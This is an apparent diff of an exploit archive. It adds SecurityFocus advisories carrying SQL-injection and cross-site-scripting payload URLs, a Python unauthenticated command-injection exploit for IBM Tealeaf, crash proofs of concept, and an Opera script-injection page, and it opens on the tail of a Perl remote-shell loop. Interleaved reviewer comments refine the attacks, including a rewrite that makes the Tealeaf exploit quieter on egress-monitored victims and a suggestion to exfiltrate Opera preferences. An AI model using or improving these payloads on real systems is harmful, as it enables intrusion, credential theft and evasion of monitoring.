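    my $out = start_exec($host, uri_escape($line));  # exactly one request per command
    print STDOUT "[athos-shell] ~# ".(defined $out ? $out : '')."\n";
}
```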


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31963/info
H&H Solutions WebSoccer is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
H&H Solutions WebSoccer 2.80 is vulnerable; other versions may also be affected.
http://www.example.com/liga.php?id=1'UNION SELECT concat_ws(0x3a,version(),database(),user()),2,3,4,5/*


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31966/info
Elkagroup is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
This issue affects Elkagroup 1.0; other versions may also be affected.
http://www.example.com/view.php?cid=-33%20UNION%20ALL%20SELECT%200,user(),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--&uid=0&new=0


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31968/info
Kmita Catalogue is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Kmita Catalogue V2 is vulnerable; other versions may also be affected.
http://www.example.com/search.php?q=<script>alert(document.cookie);</script>&Search=Search


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31970/info
Kmita Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/kmitag/index.php?begin=10<script>alert(document.cookie);</script>&catid=3
http://www.example.com/kmitag/search.php?searchtext=<script>alert(document.cookie);</script>&Search=Search

63
platforms/php/webapps/32546.py Executable file

@ -0,0 +1,63 @@
# IBM Tealeaf CX (v8 release 8) Remote OS Command Injection
# Date: 11/08/2013
# Exploit author: drone
# More information: http://www-01.ibm.com/support/docview.wss?uid=swg21667630
# Vendor homepage: http://www-01.ibm.com/software/info/tealeaf/
# Version: Version 8 Release 8 (likely all versions prior)
# Tested on: Redhat Linux 6.2
# CVE: CVE-2013-6719 / CVE-2013-6720
import requests
from argparse import ArgumentParser
""" Remote OS command injection (no auth)
IBM TeaLeaf Version 8 Release 8
drone (@dronesec)
Bonus:
LFI at /download.php?log=../../etc/passwd
"""
def run(options):
access = "http://{0}:{1}/delivery.php".format(options.address, options.port)
data = {"perform_action" : "testconn",
"delete_id" : "",
"testconn_host" : "8.8.8.8 -c 1 ; {0} ; ping 8.8.8.8 -c 1".format(options.cmd),
"testconn_port" : 1966,
"testconn_t" : "false",
"csrf" : "afe2fce60e94a235511a7397ec5c9a87fb7fc25b", # it doesnt even care
"delivery_mode" : 0,
"batch_interval" : 60,
"polling_interval" : 10,
"watchdog_timer" : 30,
"max_queue_depth" : 50000000,
"timesource_host" : "test",
"timesource_port" : 1966,
"staticshit_enabled" : "on", # seriously
"staticshit_host" : "test",
"staticshit_intervalseconds" : 60,
"staticshit_port" : 1966
}
response = requests.post(access, data=data, timeout=20.0)
if response.status_code == 200:
# lazy parsing
result = response.content.split("alert('")[1].split('onUnload')[0]
for x in result.split("\\n"):
if 'PATTERN' in x: break
print x
def parse_args():
parser = ArgumentParser()
parser.add_argument("-i", help="Server address", action="store",
required=True, dest="address")
parser.add_argument("-p", help='Server port', action='store',
dest='port', default=8080)
parser.add_argument("-c", help='Command to exec', action='store',
dest='cmd', default='whoami')
return parser.parse_args()
if __name__ == "__main__":
run(parse_args())
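Review bot: The injection string on the `testconn_host` line makes the target ping 8.8.8.8 twice per command, so each run generates outbound ICMP to Google DNS from the victim — a needless beacon from a host that may be egress-monitored, and a ~10 s stall if it has no route; `127.0.0.1` wraps the injected command just as well. The "lazy parsing" `response.content.split("alert('")[1]` raises IndexError whenever the alert is absent (error page, WAF, a patched build), hiding what actually came back; check for the marker before indexing. The script is Python 2 only (`print x`, `str` content), which the header should say, and the hard-coded `csrf` value with the quip "it doesnt even care" would read better as one docstring sentence noting that the token is not validated (CVE-2013-6720 per the header).
```python
    data = {"perform_action" : "testconn",
            "delete_id" : "",
            # loopback keeps the wrapper pings on-box: no ICMP egress to 8.8.8.8
            "testconn_host" : "127.0.0.1 -c 1 ; {0} ; ping 127.0.0.1 -c 1".format(options.cmd),
            # … unchanged: remaining form fields …
           }
    response = requests.post(access, data=data, timeout=20.0)
    if response.status_code != 200 or "alert('" not in response.content:
        print "unexpected response: HTTP %d, no alert() in body" % response.status_code
        return
    result = response.content.split("alert('")[1].split('onUnload')[0]
    # … unchanged: line-by-line printing up to PATTERN …
```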

10
platforms/php/webapps/32547.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/31971/info
Extrakt Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize
user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Extrakt Framework 0.7 is vulnerable; other versions may also be affected.
http://www.example.com/[SCRIPT_DIR]/index.php?plugins[file][id]=<script>alert(2008);</script>

11
platforms/php/webapps/32553.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/32011/info
phpWebSite is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
We don't know which versions of phpWebSite are affected. We will update this BID as more information emerges.
NOTE: The vendor refutes this issue, stating that the vulnerable script has not been present in the application since either the 0.8.x or 0.9.x releases.
http://www.example.com/links.php?op=viewlink&cid=5+and+1=2+union+select+concat(version(),0x3a,database(),0x3a,user())--
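Review bot: The advisory states the affected versions are unknown and that the vendor disputes the issue, yet the files.csv entry added for this file titles it `phpWebSite <= 0.9.3`; either record the basis for that bound here or drop it from the index title so the two agree, and the vendor's refutation should be the first thing a reader sees rather than a trailing NOTE. The single-column `union select concat(...)` only works if the original query selects exactly one column — presumably true for this `links.php` but not verifiable from this text.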


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/32012/info
SpitFire Photo Pro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/sapientphoto/pages.php?pageId=6634+and+1=2+union+select+1,2,3,4,5,6,concat(version(),0x3a,database(),0x3a,user())--

11
platforms/unix/dos/32534.py Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/31932/info
Python's 'imageop' module is prone to a buffer-overflow vulnerability.
Successful exploits may allow attackers to execute arbitrary code in the context of applications using the vulnerable Python modules. This may result in a compromise of the underlying system. Failed attempts may lead to a denial-of-service condition.
These issues affect versions prior to Python 2.5.2-r6.
import imageop
s = ''
imageop.crop(s, 1, 65536, 65536, 0, 0, 65536, 65536)
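Review bot: `versions prior to Python 2.5.2-r6` is a distribution revision (Gentoo-style `-rN`), not an upstream CPython version, so readers cannot map it to a release; the note should cite the upstream fix or the 2.5.x/2.6 release that carries it. `imageop` no longer exists in Python 3, which is worth a line now that the PoC is being archived in 2014. A comment on the call itself saying which argument pair overflows — the 65536×65536 dimensions against an empty buffer `s`, presumably an unchecked size multiplication — would turn the three lines into a reproducible crash description; confirm against the fix before stating it as fact.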


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31996/info
Microsoft DebugDiag 'CrashHangExt.dll' ActiveX control is prone to a denial-of-service vulnerability because of a NULL-pointer dereference error.
A successful attack allows a remote attacker to crash the application using the ActiveX control (typically Internet Explorer), denying further service to legitimate users.
Microsoft DebugDiag 1.0 is vulnerable; other versions may also be affected.
<body> <object classid='clsid:7233D6F8-AD31-440F-BAF0-9E7A292A53DA' id='target' /> </object> <script language='vbscript'> arg1=-2147483647 target.GetEntryPointForThread arg1 </script> </body>
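Review bot: The `<object>` element is both self-closed (`/>`) and explicitly closed (`</object>`), and the VBScript only runs in Internet Explorer with the control permitted to instantiate; harmless for a crash PoC but worth stating so nobody tries it elsewhere. The practical mitigation is missing: setting the kill bit for CLSID `7233D6F8-AD31-440F-BAF0-9E7A292A53DA` (Compatibility Flags = 0x400 under `HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility`) stops IE from instantiating the control at all, and belongs in the advisory alongside the version note.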


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/32015/info
Opera Web Browser is prone to an input-validation vulnerability because of the way it stores data used for the History Search feature.
Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, obtain sensitive information, alter the browser's configuration settings, or execute local programs in the context of the browser; other attacks are also possible.
Opera Web Browser 9.62 is vulnerable.
<!-- # OPERA 9.62 Remote Code Execution # Vulnerability Found By NeoCoderz # Email : NeoCoderz1[at]msn[dot]com --> <html> <script> function execcalc() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:config?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalc()">Click me...(opera:config)</a><br> <script> function execcalca() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:cache?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalca()">Click me...(opera:cache)</a><br> <script> function execcalcb() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:debug?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalcb()">Click me...(opera:debug)</a><br> <script> function execcalcc() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:plugins?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalcc()">Click me...(opera:plugins)</a><br> <script> function execcalcd() { var abc="c:\\\\windows\\\\system32\\\\calc.exe"; window.open('opera:about?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1'); window.setTimeout("location.href='mailto:'",4000); } </script> <body scrolling="no"> <a href="#" onclick="execcalcd()">Click me...(opera:about)</a><br> </html>
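Review bot: The payload cannot launch calc.exe as the header comment claims: `eval(abc)` runs inside the opened `opera:config` (or `opera:cache`, `opera:debug`, ...) page, where `abc` is not defined — it lives in the opener's script scope — and even if it were, evaluating the string `c:\\windows\\system32\\calc.exe` is a JavaScript SyntaxError, not a process launch. What the file actually demonstrates is script injection into opera: pages, which is what the index entry's "Input Validation" title says; the "Remote Code Execution" banner should be dropped or replaced with a payload that does something in that privileged context (e.g. reading a preference via `opera:config` DOM and exfiltrating it). The markup also opens five `<body>` elements and never closes any of them.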